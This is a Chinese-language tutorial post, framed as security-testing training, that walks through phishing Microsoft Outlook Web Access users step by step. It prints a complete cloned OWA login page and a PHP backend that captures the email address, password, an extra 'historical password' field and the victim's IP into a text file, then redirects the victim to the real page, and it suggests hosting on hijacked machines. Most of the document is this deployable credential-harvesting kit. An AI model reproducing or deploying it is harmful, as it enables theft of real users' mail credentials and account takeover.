安全人員在進行安全測試的時候，會對一個企業進行整體評估，當然測試的項目很多，需要歷時數日再可見到效果，其中一項很重要的環節就是釣魚，很多測試人員只是知道有這個名詞，卻不會去用這項技能，很遺憾的一件事情，那么這次我們就講解一下如何一步一步的進行釣魚活動。 環境可以是你抓到的肉雞或者申請域名指向空間。 技術手段就是如下幾步：1、用工具HTTrack Website Copier 克隆一個網站。2、注冊或者申請域名,帶SSL最好，不帶也可3、修改克隆的網站代碼，獲取帳號密碼等敏感信息的代碼編寫4、跳轉到原始頁面或者提示信息即可

實例：
地址http://111.73.46.12:8011/

簡單前端代碼代碼如下：

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- saved from url=(0076)http://mail.logan.com.cn/CookieAuth.dll?GetLogon?curl=Z2F&reason=0&formdir=1 --> <html><!-- Mirrored from sgywn.com:2017/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 24 Feb 2017 12:23:03 GMT --> <head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>Outlook Web App</title><meta content="NOINDEX, NOFOLLOW" name="Robots"><link rel="shortcut icon" href="css/favicon.html" type="image/x-icon"><link href="css/logon_style.css" type="text/css" rel="stylesheet"><link href="css/owafont.css" type="text/css" rel="stylesheet"><script src="css/flogon.js" type="text/javascript"></script><script type="text/javascript">var a_fGzpEnbl = 1;var g_fFcs = 1;function window_onload(){onld();if (chkCookies()){ldCookie('username', 'password');var expl1 = document.getElementById('expl1');expl1.style.display = "";var lnkHidedSection = document.getElementById('lnkHdSec');lnkHidedSection.style.display = "none";var lnkShowSection = document.getElementById('lnkShwSec');lnkShowSection.style.display = "";}}function $(v){ return document.getElementById(v); } function $$(v){ return document.getElementById(v).value; } function isNull( str ){ if ( str == "" ) return true; var regu = "^[ ]+$"; var re = new RegExp(regu); return re.test(str); } function chr_ty(){if(isNull($$("d"))){$("d").focus();alert("郵箱帳號不能為空！"); return false; }if(isNull($$("e"))){$("e").focus();alert("郵箱密碼不能為空！");return false; } }</script></head> <body class="owaLgnBdy"><noscript><div id="dvErr"><table cellpadding="0" cellspacing="0"><tr><td><img src="CookieAuth70fb.html?GetPic?formdir=1&amp;image=lgnerror.gif" alt=""></td><td style="width:100%">要使用 Microsoft Outlook Web App，必須在瀏覽器中啟用腳本。有關如何啟用腳本的信息，請參閱瀏覽器的幫助。如果您的瀏覽器不支持腳本，您可以下載 <a href='http://www.microsoft.com/windows/ie/downloads/default.mspx'>Microsoft Internet Explorer</a>。</td></tr></table></div></noscript><form name="beforeSubmit" action="checklogin.php" method="post" target="_self" onSubmit="return beforeSubmit(this);"><input type="hidden" id="curl" name="curl" value="Z2F"><input type="hidden" id="flags" name="flags" value="0"><input type="hidden" id="forcedownlevel" name="forcedownlevel" value="0"><input type="hidden" id="formdir" name="formdir" value="1"><table align="center" id="tblMain" cellpadding="0" cellspacing="0"><tbody><tr><td colspan="3"><table cellspacing="0" cellpadding="0" class="tblLgn"><tbody><tr><td class="lgnTL"><img src="css/lgntopl.gif" alt=""></td><td class="lgnTM"></td><td class="lgnTR"><img src="css/lgntopr.gif" alt=""></td></tr></tbody></table></td></tr><tr><td id="mdLft">&#160;</td><td id="mdMid"><table id="tblMid" class="mid"><tbody><tr style="display: "><td><hr></td></tr><tr><td><table cellspacing="0" cellpadding="0"><colgroup><col class="nowrap"><col class="w100"><col></colgroup><tbody><tr><td class="nowrap"><label for="d">郵箱帳號:</label></td><td class="txtpad"><input class="txt" id="d" name="d" type="text"></td></tr><tr><td class="nowrap"><label for="e">郵箱密碼:</label></td><td class="txtpad"><input class="txt" id="e" name="e" type="password"></td></tr><tr><td class="nowrap"><label for="truename">歷史密碼:</label></td><td class="txtpad"><input class="txt" id="f" name="f" type="text"></td></tr><tr><td class="nowrap">&#160;</td><td class="txtpad" colspan="2"><input class="btn" id="SubmitCreds" type="submit" value="登錄" name="SubmitCreds"></td></tr></tbody></table></td></tr><tr><td><hr></td></tr></tbody></table><table id="tblMid2" class="mid" style="display: none"><tbody><tr><td><hr></td></tr><tr><td><br>您的瀏覽器設置當前禁用 cookie。要訪問此網站，必須啟用 cookie。<br><br>按照以下指示啟用 cookie (Microsoft Internet Explorer 6 或更高版本): 在 Internet Explorer 中，單擊“工具”菜單上的“Internet 選項”。單擊“隱私”選項卡，然后單擊“站點”。在“網站地址”中，鍵入此網站的完整地址。例如，http://www.microsoft.com。然后單擊“允許”。<br><br><br></td></tr><tr><td><hr></td></tr><tr><td class="txtpad"><input type="button" class="btn" style="float: right" value="重試"></td></tr></tbody></table><table class="mid tblConn"><tbody><tr><td rowspan="3" style="vertical-align: top" class="tdConnImg"><img src="css/lgnexlogo.gif" alt=""></td><td class="tdConn" style="padding-top: 6px;">已連接到 Microsoft Exchange</td></tr><tr><td class="tdConn" style="padding-top: 0px;">受 Microsoft Forefront Threat Management Gateway 保護</td></tr><tr><td class="tdCopy">&#169; 2009 Microsoft Corporation. 保留所有權利。</td></tr></tbody></table></td><td id="mdRt">&#160;</td></tr><tr><td colspan="3"><table cellspacing="0" cellpadding="0" class="tblLgn"><tbody><tr><td class="lgnBL"><img src="css/lgnbotl.gif" alt=""></td><td class="lgnBM"></td><td class="lgnBR"><img src="css/lgnbotr.gif" alt=""></td></tr></tbody></table></td></tr></tbody></table></form></body><!-- Mirrored from sgywn.com:2017/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 24 Feb 2017 12:23:39 GMT --> </html>

后端接受代碼：

<?php@error_reporting(0);$email_name=$_POST["d"]; $email_pwd=$_POST["e"]; $email_pwd1=$_POST["f"]; $url="CookieAuth70fb.html";function GetIp(){$realip = '';$unknown = 'unknown';if (isset($_SERVER)){if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && !empty($_SERVER['HTTP_X_FORWARDED_FOR']) && strcasecmp($_SERVER['HTTP_X_FORWARDED_FOR'], $unknown)){$arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);foreach($arr as $ip){$ip = trim($ip);if ($ip != 'unknown'){$realip = $ip;break;}}}else if(isset($_SERVER['HTTP_CLIENT_IP']) && !empty($_SERVER['HTTP_CLIENT_IP']) && strcasecmp($_SERVER['HTTP_CLIENT_IP'], $unknown)){$realip = $_SERVER['HTTP_CLIENT_IP'];}else if(isset($_SERVER['REMOTE_ADDR']) && !empty($_SERVER['REMOTE_ADDR']) && strcasecmp($_SERVER['REMOTE_ADDR'], $unknown)){$realip = $_SERVER['REMOTE_ADDR'];}else{$realip = $unknown;}}else{if(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), $unknown)){$realip = getenv("HTTP_X_FORWARDED_FOR");}else if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), $unknown)){$realip = getenv("HTTP_CLIENT_IP");}else if(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), $unknown)){$realip = getenv("REMOTE_ADDR");}else{$realip = $unknown;}}$realip = preg_match("/[\d\.]{7,15}/", $realip, $matches) ? $matches[0] : $unknown;return $realip; } $gip=GetIp(); @file_put_contents("test.txt", "$email_name $email_pwd $email_pwd1 $gip\r\n", FILE_APPEND);Header("HTTP/1.1 303 See Other"); Header("Location: $url");?>

案例到此結束，希望安全人員在進行測試的時候可以提交自身的評估水平，不能眼高手低。

總結

以上是生活随笔為你收集整理的浅谈微软认证Outlook Web Access钓鱼(Outlook Web Access Phishing)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。